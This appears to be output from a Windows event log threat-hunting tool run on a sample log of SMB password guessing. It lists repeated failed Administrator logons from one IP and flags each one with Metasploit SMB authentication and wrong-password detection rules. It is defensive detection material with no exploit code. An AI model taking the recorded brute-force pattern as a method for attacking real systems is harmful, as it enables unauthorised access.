SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7MTbgvYN6PIaKxeK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tAjWfgmGrm3o2mAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9EZYPG6uQtsez1UI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: PRcnsdLAKd7enemG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUZEQaUavv7fWk4w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JKth56VEMqMCgwG9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TCGlvOFFkVpSHSoM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jmLxSIastsvqdJC8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IPyvUDHHWzbhyvZE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S7dF4fIlAvIBYiw0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bPDPtH2m9TgW8Khg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AChGHCNom0ds5ujV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8sLQI4KGgQRq2Sy9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: dqeLFLRT5EXiCBUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dx3tco9up7XnOa7h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZdNX4ubtpQaV9EeF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S05I0ZlGKGazkVkL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pzbfrYSYhxH6WcCt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGTvXs8Mlc0Fi7iT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C1LjtTFjPfPlBqAi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1lhJW3iO1xGGTMhp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMz7WmlBTgadVgN8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OB02epCA5pc5oBeJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: KAFgReUMtu9VerRl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ByeL26yQfohpQT3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 527r3nh9ocmItXfL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNeC1BBFVXv839Ys : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: juXXpQcoPfJLMQ3L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: njNdv4lGnsUpooCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j6VchLhWJT7cCWVR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r3xxnFpbd8zkFm0h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jtf156NEpOebQHGC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 17O1jfGX6KQMPgnD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 3NaqTqrCiPPfNxZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Az7cwIWXUGVIMTv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Djaxf99PVs2VkMy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rbTSoTdaQ0Y4c9Gw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g9aTo4QBHfrgPYZ2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dpHKjYzZTn0ruIrf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HqhPnV6tc8airRqu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RIOCqtXh5ji12U5q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RwuGZ0kgg1yToLlr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZSBbd4qBRuzeKBjD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 8zS1Muxc9gpcqv23 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c6wiIkfkgtso42P1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1ilRmhSB5RfvpVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PuQ47GGBraimypWL : IP Address: 192.168.198.149 : AuthPackage: 
